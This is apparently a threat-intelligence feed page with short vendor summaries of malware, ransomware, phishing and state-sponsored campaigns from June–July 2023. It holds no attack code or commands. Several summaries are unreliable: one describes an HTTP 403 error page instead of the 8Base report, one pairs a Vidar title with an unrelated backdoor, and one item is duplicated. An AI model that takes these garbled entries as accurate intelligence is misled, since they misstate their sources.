https://www.sentinelone.com/blog/neo_net-the-kingpin-of-spanish-ecrime/
—
- Intel Source:
- Uptycs
- Intel Name:
- Meduza_Stealer
- Date of Scan:
- 2023-07-05
- Impact:
- LOW
- Summary:
- Recently, while monitoring the Uptycs Threat Research team dscovered a menace named The Meduza Stealer. Created by an enigmatic actor known as ‘Meduza’, this malware has been specifically designed to target Windows users and organizations, currently targeting only ten specific countries. The Meduza Stealer has a purpose to perform data theft. It pilfers users’ browsing activities, extracting a wide array of browser-related data. From critical login credentials to the valuable record of browsing history and meticulously curated bookmarks, no digital artifact is safe. Even crypto wallet extensions, password managers, and 2FA extensions are vulnerable.
Source:
https://www.uptycs.com/blog/what-is-meduza-stealer-and-how-does-it-work
—
- Intel Source:
- Avast
- Intel Name:
- Decryption_tool_for_the_Akira_ransomware
- Date of Scan:
- 2023-07-05
- Impact:
- LOW
- Summary:
- Researchers for Avast have developed a decryptor for the Akira ransomware and released it for public download. The Akira ransomware appeared in March 2023 and since then, the gang claims successful attacks on various organizations in the education, finance and real estate industries, amongst others.
Source:
https://decoded.avast.io/threatresearch/decrypted-akira-ransomware/
—
- Intel Source:
- Wordfence
- Intel Name:
- Hackers_Exploiting_Unpatched_WordPress_Plugin_Flaw
- Date of Scan:
- 2023-07-05
- Impact:
- HIGH
- Summary:
- Wordfence researchers have identified the unpatched privilege escalation vulnerability being actively exploited in Ultimate Member, a WordPress plugin installed on over 200,000 sites. Also, discovered that this vulnerability is being actively exploited and it hasn’t been adequately patched in the latest version available, which is 2.6.6.
—
- Intel Source:
- Inky
- Intel Name:
- Malicious_QR_Codes_are_getting_to_employee_credentials
- Date of Scan:
- 2023-07-05
- Impact:
- LOW
- Summary:
- INKY recently discovered multitude of QR Code phish and shared their findings.
—
- Intel Source:
- Sophos
- Intel Name:
- Th_connection_investigation_of_2_clients_in_2_threat_hunts
- Date of Scan:
- 2023-07-05
- Impact:
- LOW
- Summary:
- Two clients, two threat hunts have been researched for any connection between them. Using Microsoft’s cloud-security API to parse piles of disparate data leads to captivation results.
—
- Intel Source:
- ASEC
- Intel Name:
- Crysis_Threat_Actor_Using_RDP_to_Install_Venus_Ransomware
- Date of Scan:
- 2023-07-05
- Impact:
- LOW
- Summary:
- ASEC researchers have disclosed that the Crysis ransomware’s threat actor is also using the Venus ransomware in the attacks. Crysis and Venus are both major ransomware types known to target externally exposed remote desktop services.
—
- Intel Source:
- Deep Instinct
- Intel Name:
- New_C2_Framework_Leveraging_by_MuddyWater
- Date of Scan:
- 2023-07-04
- Impact:
- LOW
- Summary:
- Deep Instinct researchers have observed the Iranian state-sponsored group dubbed MuddyWater has been attributed to a previously unseen command-and-control (C2) framework called PhonyC2 that’s been put to use by the actor since 2021.
—
- Intel Source:
- ASEC
- Intel Name:
- Malware_being_executed_using_DNS_TXT_records
- Date of Scan:
- 2023-07-04
- Impact:
- LOW
- Summary:
- The AhnLab Security Emergency response Center (ASEC) has discovered instances where malware is being executed using DNS TXT records. This method of malware execution is significant because it is not commonly utilized, making it challenging to detect and analyze.
—
- Intel Source:
- TrendMicro
- Intel Name:
- Ransomware_Entrapped_in_WinSCP_by_Blackcat_Operators
- Date of Scan:
- 2023-07-04
- Impact:
- LOW
- Summary:
- TrendMicro researchers have identified malicious actors using malvertising to distribute malware via cloned webpages of legitimate organizations. The distribution involved a webpage of the well-known application WinSCP, an open-source Windows application for file transfer.
—
- Intel Source:
- ISC. SANS
- Intel Name:
- Updated_GuLoader_loader
- Date of Scan:
- 2023-07-03
- Impact:
- LOW
- Summary:
- This blog post on the SANS Internet Storm Center website details an infection chain for the Remcos RAT malware. It explains how the infection began with a malicious email containing a zip archive, which resulted in the download of a password-protected zip file. Inside this zip file, there was a decoy audio file and a malicious Windows shortcut. The Windows shortcut triggered the execution of a VBS file with a PowerShell script, leading to further infection on the host. The post also provides indicators of compromise (IOCs) including email headers and file hashes.
—
- Intel Source:
- ASEC
- Intel Name:
- Malware_Disguised_as_HWP_Document_File_Kimsuky
- Date of Scan:
- 2023-07-03
- Impact:
- LOW
- Summary:
- AhnLab Security Emergency response Center (ASEC) has discovered that the Kimsuky threat group is distributing malware disguised as HWP document files. The malware is a compressed file containing a readme.txt file and an executable file with an HWP document file extension. Running the executable file decodes a PowerShell command and saves it as update.vbs in the %APPDATA% folder. The update.vbs file conducts malicious activities, including the leakage of user credentials.
—
- Intel Source:
- Cofense
- Intel Name:
- HMRC_Self_Assessment_Phish_Outsmart_SEGs
- Date of Scan:
- 2023-07-03
- Impact:
- LOW
- Summary:
- During the busy self-assessment season in the UK, threat actors take advantage of the heightened online activity to deceive unsuspecting individuals into revealing their sensitive information on fraudulent HM Revenue & Customs (HMRC) self-assessment websites. Phishing Defense Center (PDC) has noted this wave of attacks across various sectors and regrettably, these phishing emails often evade popular secure email gateways (SEGs) that are meant to provide protection for users. The phishing emails begin by pressuring users to immediately update their self-assessment online profile. This is a common tactic employed by threat actors to generate a deceptive perception of urgency and legitimacy.
—
- Intel Source:
- Morphisec
- Intel Name:
- GuLoader_Campaign_Targets_Law_Firms_in_the_US
- Date of Scan:
- 2023-07-03
- Impact:
- LOW
- Summary:
- the GuLoader campaign from infecting systems was discussed that the campaign’s targeting of specific industries and highlights the use of legitimate hosting services for distributing malware. The main focus is on the delivery of the Remcos RAT through GuLoader and how Morphisec’s AMTD technology can protect systems from these attacks.
Source:
https://blog.morphisec.com/guloader-campaign-targets-law-firms-in-the-us
—
- Intel Source:
- volexity
- Intel Name:
- Charming_Kitten_updates_backdoor_called_POWERSTAR
- Date of Scan:
- 2023-07-02
- Impact:
- MEDIUM
- Summary:
- Volexity reserachers very often sees one threat actor that using techniques is Charming Kitten, who is assumed to be operating out of Iran. Charming Kitten is primarily concerned with collecting intelligence by compromising account credentials and, the email of individuals they successfully spear phishing. The new version of POWERSTAR backddor was analyzed by the Volexity team and led the to the discovery that Charming Kitten has been spreading their malware alongside their spear-phishing techniques.
—
- Intel Source:
- ASEC
- Intel Name:
- ASEC_Weekly_Phishing_Email_Threats_analyses_June11_17_2023
- Date of Scan:
- 2023-07-02
- Impact:
- LOW
- Summary:
- The ASEC analysis team keeps monitoring phishing email threats with their system and honeypot. This article explains the distribution of phishing emails during the week from June 11th to June 17th, 2023 and provide statistical information on each type.
—
- Intel Source:
- PaloAlto
- Intel Name:
- Detecting_Popular_Cobalt_Strike_Malleable_C2_Profile_Techniques
- Date of Scan:
- 2023-07-02
- Impact:
- LOW
- Summary:
- Overall, Unit 42 researchers have discovered two Cobalt Strike Team Server instances hosted online. They have also found new malleable C2 profiles that are not publicly available, which attackers use to avoid detection and exploit Cobalt Strike. They have also found new malleable C2 profiles that are not publicly available, which attackers use to avoid detection and exploit Cobalt Strike. The operators of these Team Server instances hide their C2 infrastructure using popular services and public cloud infrastructure providers. Additionally, the researchers have provided guidance for Palo Alto Networks customers on how to receive protection and mitigation against Cobalt Strike Beacon and other related Cobalt Strike tools.
Source:
https://unit42.paloaltonetworks.com/cobalt-strike-malleable-c2/
—
- Intel Source:
- vmware
- Intel Name:
- 8Base_Ransomware
- Date of Scan:
- 2023-07-02
- Impact:
- LOW
- Summary:
- The 8Base ransomware group has remained relatively unknown despite the massive spike in activity in Summer of 2023. The subpage provides information about an HTTP 403 error, but does not offer any further details.
Source:
https://blogs.vmware.com/security/2023/06/8base-ransomware-a-heavy-hitting-player.html
—
- Intel Source:
- Sentilone
- Intel Name:
- The_exposion_of_active_adversary_JokerSpy
- Date of Scan:
- 2023-07-01
- Impact:
- LOW
- Summary:
- The researchers at BitDefender and Elastic have discovered an active adversary starting a novel spyware, cross-platform backdoors and an open-source reconnaissance tool to compromise organizations with macOS devices in their cortege. So far there are not a lot of known victims at this time, the analysis suggest that the threat actors have likely targeted other organizations. Sentilone reserachers shared their key components and indicators used in the campaign to help raise awareness and aid security teams and threat hunters.
—
- Intel Source:
- PaloAlto
- Intel Name:
- Manic_Menagerie_2_0_threat_actor
- Date of Scan:
- 2023-07-01
- Impact:
- MEDIUM
- Summary:
- Unit 42 researchers discovered an active campaign that aims several web hosting and IT providers in the United States and European Union from late 2020 to late 2022. Unit 42 assumes the activity associated with this campaign as CL-CRI-0021 and believes it stems from the same threat actor responsible for the previous campaign known as Manic Menagerie.
Source:
https://unit42.paloaltonetworks.com/manic-menagerie-targets-web-hosting-and-it/
—
- Intel Source:
- Fortinet
- Intel Name:
- New_Fast_Developing_ThirdEye_Infostealer
- Date of Scan:
- 2023-06-30
- Impact:
- LOW
- Summary:
- FortiGuard Labs recently discovered some files that look suspicious. Their investigation discovered that the files are malicious and revealed there is more to them than meets the eye: they are a previously unseen infostealer that was named “ThirdEye”. While this malware is not considered sophisticated, it’s targeting to steal various information from compromised machines that can be used as step for future attacks.
—
- Intel Source:
- Cofense
- Intel Name:
- Malicious_Actors_deploy_phishing_pages_to_mobile_devices
- Date of Scan:
- 2023-06-30
- Impact:
- LOW
- Summary:
- The Cofense Phishing Defense Center analysts has discovered a spike in the number of malicious emails utilizing this attack vector. In order to bypass traditional file and text detection software, QR codes provide threat actors with a different tactic to encode malicious URLs.
—
- Intel Source:
- ASEC
- Intel Name:
- ASEC_Weekly_Malware_Analysis_June_5_June_11th_2023
- Date of Scan:
- 2023-06-29
- Impact:
- LOW
- Summary:
- The ASEC analysis team keeps monitoring a weekly malware collection samples for June 5-11th, 2023. They used their automatic analysis system RAPIT to categorize and respond to known malware.The top malwares for this week are Amadey, Lokibot, Guloader, AgentTesla and Formbook.
—
- Intel Source:
- Cyble
- Intel Name:
- Linux_Users_at_Risk_From_Akira_Ransomware
- Date of Scan:
- 2023-06-28
- Impact:
- LOW
- Summary:
- Cyble researchers have recently shared crucial details about the activities of a newly identified ransomware group known as “Akira.” This group is actively targeting numerous organizations, compromising their sensitive data. It is worth noting that Akira ransomware has expanded its operations to include the Linux platform.
Source:
https://blog.cyble.com/2023/06/28/akira-ransomware-extends-reach-to-linux-platform/
—
- Intel Source:
- Avanan
- Intel Name:
- PDF_Based_Attacks_Are_Becoming_More_Common
- Date of Scan:
- 2023-06-28
- Impact:
- LOW
- Summary:
- Researchers from Avanan have deep-dived into PDF-based attacks and identified that the malicious PDF file masquerades as a legitimate ‘DocuSign’ document, luring unsuspecting users to a fraudulent webpage where they are asked to enter their login credentials, including the recipient’s email address.
Source:
https://www.avanan.com/blog/pdf-based-attacks-on-the-rise-heres-how-deep-learning-can-prevent-them
—
- Intel Source:
- Cybergeeks
- Intel Name:
- The_details_of_the_Saltwater_Backdoor_used_in_Barracuda_vulnerability
- Date of Scan:
- 2023-06-27
- Impact:
- MEDIUM
- Summary:
- SALTWATER is a backdoor that exploiting the Barracuda 0-day vulnerability CVE-2023-2868. It is a module for the Barracuda SMTP daemon called bsmtpd. The malware hooked the recv, send, and close functions using an open-source hooking library called funchook. The following functionalities are implemented: execute arbitrary commands, download and upload files, proxy functionality, and tunneling functionality.
—
- Intel Source:
- Krebson Security
- Intel Name:
- SMS_Phishers_hacked_sensitive_data_from_UPS_Tracking_Tool
- Date of Scan:
- 2023-06-27
- Impact:
- LOW
- Summary:
- The United Parcel Service (UPS) says fraudsters have been harvesting phone numbers and other information from its online shipment tracking tool in Canada to send highly targeted SMS phishing (a.k.a. “smishing”) messages that spoofed UPS and other top brands.
—
- Intel Source:
- Fortinet
- Intel Name:
- The_Black_Basta_ransomware_cover_of_roundup
- Date of Scan:
- 2023-06-27
- Impact:
- MEDIUM
- Summary:
- FortiGuard Labs analysts analyzed data on ransomware variants that have been gaining intrest within their datasets and the OSINT community. Their Ransomware Roundup report shares with readers the brief insights into the evolving ransomware landscape and the Fortinet solutions that protect against those variants.
Source:
https://www.fortinet.com/blog/threat-research/ransomware-roundup-black-basta
—
- Intel Source:
- Cyble
- Intel Name:
- The_details_of_Wagner_Groups_Cyber_campaign
- Date of Scan:
- 2023-06-27
- Impact:
- LOW
- Summary:
- Cyble researchers investigated a new ransomware called Wagner. This ransomware is possible a variant of Chaos ransomware. The reserachers analyzed that the ransom note insists users to join the PMC Wagner. It was discovered that the ransomware sample was initially submitted on VirusTotal from Russia. Because the ransom note is written in Russian, it assumes that the ransomware may primarily target victims within Russia. The Wagner ransomware is a 32-bit binary targeting the Windows operating system.
Source:
https://blog.cyble.com/2023/06/27/unveiling-wagner-groups-cyber-recruitment/
—
- Intel Source:
- IBM Security Intelligence
- Intel Name:
- The_Examination_of_Trickbot_and_Conti_Crypters
- Date of Scan:
- 2023-06-27
- Impact:
- LOW
- Summary:
- IBM Security X-Force researchers have deep-dived into the crypters used by the Trickbot/Conti syndicate.
Source:
https://securityintelligence.com/posts/trickbot-conti-crypters-where-are-they-now/
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Email_Spam_using_Modiloader_Attachments
- Date of Scan:
- 2023-06-26
- Impact:
- LOW
- Summary:
- Researchers from SANS have analyzed 2 emails attachment in quarantine that had different text with the same attachment.
Source:
https://isc.sans.edu/diary/Email+Spam+with+Attachment+Modiloader/29978/
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Word_Document_with_Online_Template_Attached
- Date of Scan:
- 2023-06-26
- Impact:
- LOW
- Summary:
- Researchers from SANS has been found behaving like a dropper. It uses a remote Word template and makes an HTTP request to an external website.
Source:
https://isc.sans.edu/diary/Word+Document+with+an+Online+Attached+Template/29976/
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Qakbot_Distributing_Tag_via_Obama_Series
- Date of Scan:
- 2023-06-24
- Impact:
- LOW
- Summary:
- Qakbot using the Obama-series distribution tag has been active this week on Tuesday 2023-06-20 (obama269), Wednesday 2023-06-21 (obama270), and Thursday 2023-06-22 (obama271).
Source:
https://isc.sans.edu/diary/Qakbot+Qbot+activity+obama271+distribution+tag/29968/
—
- Intel Source:
- Deep Instinct
- Intel Name:
- Powerful_JavaScript_Dropper_PindOS_Spreading_Bumblebee_and_IcedID_Malware
- Date of Scan:
- 2023-06-24
- Impact:
- MEDIUM
- Summary:
- Deep Instinct researchers have observed a new strain of JavaScript dropper which is delivering next-stage payloads like Bumblebee and IcedID.
Source:
https://www.deepinstinct.com/blog/pindos-new-javascript-dropper-delivering-bumblebee-and-icedid
—
- Intel Source:
- TrendMicro
- Intel Name:
- An_Overview_of_Trigona_Ransomware_Various_Versions
- Date of Scan:
- 2023-06-23
- Impact:
- LOW
- Summary:
- The Trigona ransomware is a relatively new ransomware family that began activities around late October 2022 — although samples of it existed as early as June 2022. Since then, Trigona’s operators have remained highly active, and in fact, have been continuously updating their ransomware binaries.
Source:
https://www.trendmicro.com/en_us/research/23/f/an-overview-of-the-trigona-ransomware.html
—
- Intel Source:
- Checkpoint
- Intel Name:
- Hackers_Using_USB_Driven_Self_Propagating_Malware_to_Attack_the_Camaro_Dragon
- Date of Scan:
- 2023-06-23
- Impact:
- MEDIUM
- Summary:
- Checkpoint researchers have identified that the Chinese cyber espionage actor known as Camaro Dragonleveraging a new strain of self-propagating malware that spreads through compromised USB drives.
—
- Intel Source:
- Krebson Security
- Intel Name:
- The_Service_in_question_rents_email_addresses
- Date of Scan:
- 2023-06-23
- Impact:
- LOW
- Summary:
- The service in question from KrebosSecurity blog was kopeechka[.]store — is a kind of unidirectional email confirmation-as-a-service that lures you to “save your time and money for successfully registering multiple accounts.” That new service offers to help to save and cut costs associated with large-scale spam and account creation campaigns, by paying people to sell their email account credentials and letting customers temporarily rent access to a vast pool of established accounts at major providers.
—
- Intel Source:
- Zscaler
- Intel Name:
- RedEnergy_Stealer_as_a_Ransomware_Attacks
- Date of Scan:
- 2023-06-23
- Impact:
- LOW
- Summary:
- Zscaler researchers have discovered a new malware variant, RedEnergy stealer that fits into the hybrid Stealer-as-a-Ransomware threat category. RedEnergy stealer uses a fake update campaign to target multiple industry verticals and possesses the ability to steal information from various browsers, enabling the exfiltration of sensitive data, while also incorporating different modules for carrying out ransomware activities.
—
- Intel Source:
- Cyble
- Intel Name:
- New_Infection_Strategy_Implemented_by_Mallox_Ransomware
- Date of Scan:
- 2023-06-23
- Impact:
- LOW
- Summary:
- Cyble researchers have observed a new variation of the Mallox ransomware that now appends the file extension .malox to the encrypted files, whereas previously, it used the .mallox extension. This ransomware binary is deployed using BatLoader, which is similar to the one reported – spreading RATs and Stealers.
Source:
https://blog.cyble.com/2023/06/22/mallox-ransomware-implements-new-infection-strategy/
—
- Intel Source:
- PaloAlto
- Intel Name:
- Multiple_IoT_Exploits_Used_in_Latest_Mirai_Campaign
- Date of Scan:
- 2023-06-23
- Impact:
- LOW
- Summary:
- Paloalto researchers have observed threat actors leveraging several IoT vulnerabilities to spread a variant of the Mirai botnet.
Source:
https://unit42.paloaltonetworks.com/mirai-variant-targets-iot-exploits/
—
- Intel Source:
- Cyble
- Intel Name:
- New_Infection_Strategy_of_Mallox_Ransomware
- Date of Scan:
- 2023-06-23
- Impact:
- LOW
- Summary:
- Two years ago, the new ransomware appeared known as “TargetCompany”. and got a lot of attention due to its unique method of appending the name of the targeted company as a file extension This ransomware variant was also noticed using a “.mallox” extension to encrypted files, linking it to its previous identification as “Mallox”. Last year, Cyble Research analysts also observed a significant spike in the Mallox ransomware samples. Cyble analysts discovered a new variation of the Mallox ransomware that now appends the file extension “.malox” to the encrypted files, whereas previously, it used the “.mallox” extension. This ransomware binary is deployed using BatLoader, which is similar to the one reported – spreading RATs and Stealers.
Source:
https://blog.cyble.com/2023/06/22/mallox-ransomware-implements-new-infection-strategy/
—
- Intel Source:
- Microsoft
- Intel Name:
- Cryptocurrency_Mining_Campaigns_Targeting_Linux_and_IoT_Devices
- Date of Scan:
- 2023-06-23
- Impact:
- LOW
- Summary:
- Microsoft researchers have identified that Internet-facing Linux systems and Internet of Things (IoT) devices are being targeted as part of a new campaign designed to illicitly mine cryptocurrency.
—
- Intel Source:
- Securonix Threat Labs
- Intel Name:
- New_MULTI_STORM_Attack_Campaign_by_Python_Loader
- Date of Scan:
- 2023-06-22
- Impact:
- MEDIUM
- Summary:
- An interesting phishing campaign was recently analyzed by the Securonix Threat Research Team. The attack kicks off when the user clicks on a heavily obfuscated JavaScript file contained in a password protected zip file. The attack chain ends with the victim machine infected with multiple unique RAT (remote access trojan) malware instances, such as Warzone RAT and Quasar RAT. Both are used for command and control during different stages of the infection chain.
—
- Intel Source:
- Fortinet
- Intel Name:
- Condi_DDoS_Botnet_Spreading_Through_TP_Link_Vulnerability
- Date of Scan:
- 2023-06-22
- Impact:
- LOW
- Summary:
- Fortinet researchers have observed that a new DDoS-as-a-Service botnet called “Condi” emerged in May 2023, exploiting a vulnerability in TP-Link Archer AX21 (AX1800) Wi-Fi routers to build an army of bots to conduct attacks.
Source:
https://www.fortinet.com/blog/threat-research/condi-ddos-botnet-spreads-via-tp-links-cve-2023-1389
—
- Intel Source:
- ASEC
- Intel Name:
- The_Examination_of_Ransomware_With_BAT_File_Extension_Attacking_MS_SQL_Servers
- Date of Scan:
- 2023-06-22
- Impact:
- LOW
- Summary:
- ASEC researchers have discovered the Mallox ransomware with the BAT file extension distributing to poorly managed MS-SQL servers. Extensions of files distributed to poorly managed MS-SQL servers include not only EXE but also BAT, which is a fileless format. The files distributed with the BAT file extension that has been discovered so far are Remcos RAT and Mallox.
—
- Intel Source:
- PaloAlto
- Intel Name:
- Evaluation_of_Threat_Group_Muddled_Libra
- Date of Scan:
- 2023-06-22
- Impact:
- LOW
- Summary:
- PaloAlto researchers have identified that a new threat group dubbed “Muddled Libra” is targeting large outsourcing firms with multi-layered, persistent attacks that start with smishing and end with data theft. The group is also using the infrastructure that it compromises in downstream attacks on victims’ customers.
—
- Intel Source:
- ASEC
- Intel Name:
- RedEyes_Group_Wiretapping_Individuals
- Date of Scan:
- 2023-06-22
- Impact:
- LOW
- Summary:
- ASEC researchers have discovered the redEyes (APT37) is a state-sponsored APT group targeting individuals. They recently used an Infostealer with wiretapping capabilities and a GoLang backdoor. Spear phishing emails were used for initial access, and Ably platform for command and control. Privilege escalation techniques were employed, and an Infostealer named FadeStealer stole data and wiretapped microphones.
—
- Intel Source:
- ASEC
- Intel Name:
- Kimsuky_Distributing_CHM_Malware
- Date of Scan:
- 2023-06-22
- Impact:
- LOW
- Summary:
- ASEC researchers have continuously tracked the Kimsuky group’s APT attacks. While the Kimsuky group often used document files for malware distribution, there have been many recent cases where CHM files were used in distribution. Also, unlike in the past when the document files contained North Korea-related topics, the group is now attempting to attack using a variety of subjects.
—
- Intel Source:
- CERT-UA
- Intel Name:
- APT28_Group_Leveraging_Three_Roundcube_Exploits
- Date of Scan:
- 2023-06-22
- Impact:
- LOW
- Summary:
- CERT-UA researchers have discovered APT28 utilized three exploits targeting Roundcube (CVE-2020-35730, CVE-2021-44026, CVE-2020-12641) during a recent espionage campaign against a Ukrainian government organization. The attack involved malicious emails containing exploit code and JavaScript files for exfiltration
—
- Intel Source:
- Symantec
- Intel Name:
- Chinese_Hacking_Group_Flea_Targeting_American_Ministries
- Date of Scan:
- 2023-06-22
- Impact:
- MEDIUM
- Summary:
- Symantec researchers have identified that a Chinese state-sponsored actor named Flea targeting Foreign affairs ministries in the Americas as part of a recent campaign that spanned from late 2022 to early 2023.
—
- Intel Source:
- Bitdefender
- Intel Name:
- Hackers_Running_an_Active_Cryptojacking_Campaign
- Date of Scan:
- 2023-06-21
- Impact:
- LOW
- Summary:
- Bitdefender security researchers have discovered a threat group likely based in Romania that’s been active since at least 2020. They’ve been targeting Linux-based machines with weak SSH credentials, mainly to deploy Monero mining malware, but their toolbox allows for other kinds of attacks.
—
- Intel Source:
- ASEC
- Intel Name:
- ASEC_Weekly_Phishing_Email_analysis_June_4_10_2023
- Date of Scan:
- 2023-06-21
- Impact:
- LOW
- Summary:
- The ASEC analysis team keep monitoring phishing email threats with their automatic sample analysis system (RAPIT) and honeypot. Their post explained the samples of distribution of phishing emails during the week from June 4, 2023 to June 10th, 2023. They covered the cases of distribution of phishing emails during the week from June 4th, 2023 to June 10th, 2022 and provide statistical information on each type.
—
- Intel Source:
- ASEC
- Intel Name:
- Disguised_malware_as_a_security_update_installer
- Date of Scan:
- 2023-06-21
- Impact:
- LOW
- Summary:
- AhnLab recently discovered the attack of a hacking group that is supported by a certain government. The discovered malware disguised itself as a security update installer and was developed using the Inno Setup software.
—
- Intel Source:
- Esentire
- Intel Name:
- Aurora_Stealer_malware_analysis
- Date of Scan:
- 2023-06-21
- Impact:
- LOW
- Summary:
- The subpage discusses the Aurora Stealer malware targeting the manufacturing industry through fake downloads distributed via Google Ads. The malware gathers sensitive data, has a pricing plan, and is written in the Go Programming language. It also provides indicators of compromise and recommendations for protection against the malware.
Source:
https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-aurora-stealer
—
- Intel Source:
- Checkpoint
- Intel Name:
- Attackers_Abusing_Legitimate_Services_For_Credential_Theft
- Date of Scan:
- 2023-06-21
- Impact:
- LOW
- Summary:
- Check Point researchers have detected an ongoing phishing campaign that uses legitimate services for credential harvesting and data exfiltration in order to evade detection.
—
- Intel Source:
- Fortinet
- Intel Name:
- New_Ransomware_Variant_Big_Head
- Date of Scan:
- 2023-06-21
- Impact:
- LOW
- Summary:
- FortiGuard Labs have recently come across a new ransomware variant called Big Head, which came out in May 2023. Although there are at least three variants of Big Head ransomware, all are designed to encrypt files on victims’ machines to extort money, like other ransomware variants.
Source:
https://www.fortinet.com/blog/threat-research/fortiguard-labs-ransomware-roundup-big-head
—
- Intel Source:
- Cyble
- Intel Name:
- New_Malware_Campaign_Targeting_LetsVPN_Users
- Date of Scan:
- 2023-06-21
- Impact:
- LOW
- Summary:
- Cyble researchers have discovered the existence of numerous counterfeit LetsVPN websites while conducting a routine threat-hunting exercise. These fraudulent sites share a common user interface and are deliberately designed to distribute malware, masquerading as the genuine LetsVPN application.
Source:
https://blog.cyble.com/2023/06/16/new-malware-campaign-targets-letsvpn-users/
—
- Intel Source:
- eSentire
- Intel Name:
- The_Analysis_of_Resident_Campaign
- Date of Scan:
- 2023-06-21
- Impact:
- LOW
- Summary:
- eSentire researchers have observed the resurgence of what we believe to be a malicious campaign targeting manufacturing, commercial, and healthcare organizations.
Source:
https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign
—
- Intel Source:
- Esentire
- Intel Name:
- DcRAT_a_clone_of_AsyncRAT
- Date of Scan:
- 2023-06-21
- Impact:
- LOW
- Summary:
- In May 2023, eSentire identified DcRAT, a clone of AsyncRAT, at a consumer services customer. DcRAT is a remote access tool with info-stealing and ransomware capabilities. The malware is actively distributed using explicit lures for OnlyFans pages and other adult content.
—
- Intel Source:
- Team Cymru
- Intel Name:
- The_Aesi_Return_with_Darth_Vidar
- Date of Scan:
- 2023-06-21
- Impact:
- LOW
- Summary:
- Researchers from Team-Cymru have observed that Vidar threat actors continue to rotate their backend IP infrastructure, favoring providers in Moldova and Russia.
Source:
https://www.team-cymru.com/post/darth-vidar-the-aesir-strike-back
—
- Intel Source:
- Bitdefender
- Intel Name:
- The_Aesir_Return_with_Darth_Vidar
- Date of Scan:
- 2023-06-20
- Impact:
- LOW
- Summary:
- BitDefender researchers have identified the behaviors in a recent incident investigated by them, where a presumably custom malware tracked by researchers as Logutil backdoor was deployed. The operation was active for more than a year with the end goal of compromising credentials and data exfiltration.
—
- Intel Source:
- PaloAlto
- Intel Name:
- Hackers_Targeting_Middle_Eastern_and_African_Governments_with_Advanced_Techniques
- Date of Scan:
- 2023-06-20
- Impact:
- MEDIUM
- Summary:
- PaloAlto researchers have identified that Governmental entities in the Middle East and Africa have been at the receiving end of sustained cyber-espionage attacks that leverage never-before-seen and rare credential theft and Exchange email exfiltration techniques.
—
- Intel Source:
- ASEC
- Intel Name:
- RecordBreaker_Infostealer_Disguised_as_a_Dot_NET_Installer
- Date of Scan:
- 2023-06-20
- Impact:
- LOW
- Summary:
- ASEC researchers have observed that the encrypted malware file is downloaded from the threat actor’s server and executed. The malware in this instance is the RecordBreaker (Raccoon Stealer V2) Infostealer.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Malware_Delivering_Through_Dot_inf_File
- Date of Scan:
- 2023-06-20
- Impact:
- LOW
- Summary:
- Researchers from SANS have analyzed the .inf files and observed that it is delivering malware.
—
- Intel Source:
- ASEC
- Intel Name:
- Tsunami_DDoS_Malware_Distributing_to_Linux_SSH_Servers
- Date of Scan:
- 2023-06-20
- Impact:
- MEDIUM
- Summary:
- ASEC researchers have discovered an attack campaign that consists of the Tsunami DDoS Bot being installed on inadequately managed Linux SSH servers. Not only did the threat actor install Tsunami, but they also installed various other malware such as ShellBot, XMRig CoinMiner, and Log Cleaner.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- RAT_Delivering_Through_VBS
- Date of Scan:
- 2023-06-19
- Impact:
- LOW
- Summary:
- Researchers from SANS have observed that RAT is delivering via VBS.
—
- Intel Source:
- CERT-UA
- Intel Name:
- Cyberattacks_Against_Users_of_UKR_NET_Service
- Date of Scan:
- 2023-06-19
- Impact:
- MEDIUM
- Summary:
- CERT-UA researchers have identified an e-mail was received from a participant of the information exchange with the subject “Suspicious activity observed @UKR.NET” and an attachment in the form of a PDF file “Security warning.pdf” sent, apparently, on behalf of UKR.NET technical support. The mentioned PDF document contains a link to a fraudulent web resource that imitates the web page of the postal service.
—
- Intel Source:
- CERT-UA
- Intel Name:
- GhostWriter_Group_Targeting_State_Organization_of_Ukraine
- Date of Scan:
- 2023-06-19
- Impact:
- MEDIUM
- Summary:
- CERT-UA researchers have discovered the PPT document “daewdfq342r.ppt”, which contains a macro and a thumbnail image with the emblem of the National Defense University of Ukraine named after Ivan Chernyakhivskyi.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Formbook_From_Possible_ModiLoader
- Date of Scan:
- 2023-06-19
- Impact:
- LOW
- Summary:
- Researchers from SANS have analyzed the recent Formbook samples and came across an example that kicks off with an Excel file exploiting CVE-2017-11882 to use what seems like ModiLoader (also known as DBatLoader).
—
- Intel Source:
- Cyfirma
- Intel Name:
- An_Evolving_Stealer_Called_Mystic
- Date of Scan:
- 2023-06-18
- Impact:
- LOW
- Summary:
- CYFIRMA researchers’ team recently discovered an information stealer called Mystic Stealer being promoted in an underground forum, with the threat actor utilizing a Telegram channel for their operations.
Source:
https://www.cyfirma.com/outofband/mystic-stealer-evolving-stealth-malware/
—
- Intel Source:
- Cofense
- Intel Name:
- MultiStage_Phishing_Attac_Targeted_Xneelo_Users
- Date of Scan:
- 2023-06-17
- Impact:
- LOW
- Summary:
- Cofense researchers have observed multi-stage phishing campaign targeting Xneelo customers was discovered, involving a fake KonsoleH login page to obtain login details, credit card information, and SMS 2FA codes.
Source:
https://cofense.com/blog/xneelo-users-targeted-in-a-multi-stage-phishing-attack/
—
- Intel Source:
- Sygnia
- Intel Name:
- Analazying_a_global_adversary_in_the_middle_campaign
- Date of Scan:
- 2023-06-17
- Impact:
- LOW
- Summary:
- In the begining of this year, Sygnia’s IR team was investigating and analyzing about a Business Email Compromise (BEC) attack against one of its clients.The threat actor gained initial access to one of the victim employees’ accounts and executed an ‘Adversary In The Middle’ attack to bypass Office365 authentication and gain persistent access to that account. After getting the access, the threat actor exfiltrated data from the compromised account and used his access to spread phishing attacks to other victim’s employees along with several external targeted organizations.
Source:
https://blog.sygnia.co/cracking-global-phishing-campaign-using-threat-intelligence-toolkit
—
- Intel Source:
- Stairwell
- Intel Name:
- Chinese_Hackers_Using_DNS_Over_HTTPS_For_Linux_Malware_Communication
- Date of Scan:
- 2023-06-17
- Impact:
- LOW
- Summary:
- Researchers from Stairwell have observed that the Chinese threat group ‘ChamelGang’ infecting Linux devices with a previously unknown implant named ‘ChamelDoH,’ allowing DNS-over-HTTPS communications with attackers’ servers.
Source:
https://stairwell.com/news/chamelgang-and-chameldoh-a-dns-over-https-implant/
—
- Intel Source:
- Checkmarx
